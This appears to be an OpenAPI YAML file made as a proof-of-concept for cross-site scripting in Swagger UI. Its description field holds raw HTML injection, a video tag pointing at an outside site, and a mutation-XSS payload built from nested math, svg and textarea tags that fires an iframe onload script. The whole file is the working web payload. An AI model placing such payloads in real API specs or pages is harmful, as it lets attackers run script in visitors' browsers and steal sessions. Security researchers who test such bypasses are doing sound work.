openapi: "3.0.0"

info:
  title: paulisusu sihuo Swagger XSS html injection
  description:
    <h1>test h1 tag</h1>
    <h1>poc</h1>
    Please Authorize!<video src=//authorization.site>
    <math><mi><table><mglyph><svg><mtext><textarea><a title="</textarea><iframe onload='alert(document.domain)'>"></a></textarea></mtext></svg></mglyph></table></mi></math>
